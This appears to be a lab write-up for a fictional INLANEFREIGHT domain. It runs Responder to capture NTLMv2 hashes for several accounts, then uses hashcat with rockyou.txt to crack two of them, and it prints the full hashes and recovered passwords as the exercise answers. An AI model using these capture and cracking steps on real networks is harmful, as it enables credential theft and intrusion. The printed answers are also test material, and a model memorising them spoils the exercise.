Writeup

Run Responder and obtain a hash for a user account that starts with the letter b. Submit the account name as your answer.

responder -I ens224
[MSSQL] NTLMv2 Client   : 172.16.5.130                                           
[MSSQL] NTLMv2 Username : INLANEFREIGHT\\lab_adm                                  
[MSSQL] NTLMv2 Hash     : lab_adm::INLANEFREIGHT:74698be19e569dcb:A7136C3D78A175126E60AC97830D48A2:0101000000000000D7280B875647DC01E5C492DB9F813D760000000002000800300034004D00450001001E00570049004E002D004C00590
05A0055004200330050004D0051005200320004001400300034004D0045002E004C004F00430041004C0003003400570049004E002D004C0059005A0055004200330050004D005100520032002E00300034004D0045002E004C004F00430041004C000500140030003
4004D0045002E004C004F00430041004C0008003000300000000000000000000000003000001353357ADE79BA68FF98947FC664DEFA5C130B05037975DB0EC4E9C13281D00E0A0010000000000000000000000000000000000009003A004D005300530051004C00530
0760063002F00610063006100640065006D0079002D00650061002D0077006500620030003A0031003400330033000000000000000000
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\\clusteragent                           
[SMB] NTLMv2-SSP Hash     : clusteragent::INLANEFREIGHT:d0e97299c1c2518a:872A6C136EBE5666606471390F4C0B07:0101000000000000802D6EFD3447DC018742B134C8181B990000000002000800300034004D00450001001E00570049004E002D00
4C0059005A0055004200330050004D0051005200320004003400570049004E002D004C0059005A0055004200330050004D005100520032002E00300034004D0045002E004C004F00430041004C0003001400300034004D0045002E004C004F00430041004C00050014
00300034004D0045002E004C004F00430041004C0007000800802D6EFD3447DC01060004000200000008003000300000000000000000000000003000001353357ADE79BA68FF98947FC664DEFA5C130B05037975DB0EC4E9C13281D00E0A0010000000000000000000
00000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\\backupagent                            
[SMB] NTLMv2-SSP Hash     : backupagent::INLANEFREIGHT:8cc8d51774591a26:C6CCAA2836BA382D2A9CFD0355702C5D:0101000000000000802D6EFD3447DC0184611FCECD9094260000000002000800300034004D00450001001E00570049004E002D004
C0059005A0055004200330050004D0051005200320004003400570049004E002D004C0059005A0055004200330050004D005100520032002E00300034004D0045002E004C004F00430041004C0003001400300034004D0045002E004C004F00430041004C000500140
0300034004D0045002E004C004F00430041004C0007000800802D6EFD3447DC01060004000200000008003000300000000000000000000000003000001353357ADE79BA68FF98947FC664DEFA5C130B05037975DB0EC4E9C13281D00E0A00100000000000000000000
0000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000

Crack the hash for the previous account and submit the cleartext password as your answer.

hashcat -m 5600 hash tools/rockyou.txt
BACKUPAGENT::INLANEFREIGHT:8cc8d51774591a26:c6ccaa2836ba382d2a9cfd0355702c5d:0101000000000000802d6efd3447dc0184611fcecd9094260000000002000800300034004d00450001001e00570049004e002d004c0059005a0055004200330050004d0051005200320004003400570049004e002d004c0059005a0055004200330050004d005100520032002e00300034004d0045002e004c004f00430041004c0003001400300034004d0045002e004c004f00430041004c0005001400300034004d0045002e004c004f00430041004c0007000800802d6efd3447dc01060004000200000008003000300000000000000000000000003000001353357ade79ba68ff98947fc664defa5c130b05037975db0ec4e9c13281d00e0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e0035002e003200320035000000000000000000:h1backup55

Run Responder and obtain an NTLMv2 hash for the user wley. Crack the hash using Hashcat and submit the user's password as your answer.

[SMB] NTLMv2-SSP Client   : 172.16.5.130
[SMB] NTLMv2-SSP Username : INLANEFREIGHT\\wley
[SMB] NTLMv2-SSP Hash     : wley::INLANEFREIGHT:571b076c3f104688:198CAB7F99DD44AF5750E5875571E3F8:010100000000000000BF40EB3547DC01FBBB30C9AB63FDA30000000002000800320039004D00510001001E00570049004E002D003000420042004B005A0043004800510047004C00570004003400570049004E002D003000420042004B005A0043004800510047004C0057002E00320039004D0051002E004C004F00430041004C0003001400320039004D0051002E004C004F00430041004C0005001400320039004D0051002E004C004F00430041004C000700080000BF40EB3547DC01060004000200000008003000300000000000000000000000003000001353357ADE79BA68FF98947FC664DEFA5C130B05037975DB0EC4E9C13281D00E0A001000000000000000000000000000000000000900220063006900660073002F003100370032002E00310036002E0035002E003200320035000000000000000000
hashcat -m 5600 hash tools/rockyou.txt
WLEY::INLANEFREIGHT:571b076c3f104688:198cab7f99dd44af5750e5875571e3f8:010100000000000000bf40eb3547dc01fbbb30c9ab63fda30000000002000800320039004d00510001001e00570049004e002d003000420042004b005a0043004800510047004c00570004003400570049004e002d003000420042004b005a0043004800510047004c0057002e00320039004d0051002e004c004f00430041004c0003001400320039004d0051002e004c004f00430041004c0005001400320039004d0051002e004c004f00430041004c000700080000bf40eb3547dc01060004000200000008003000300000000000000000000000003000001353357ade79ba68ff98947fc664defa5c130b05037975db0ec4e9c13281d00e0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e0035002e003200320035000000000000000000:transporter@4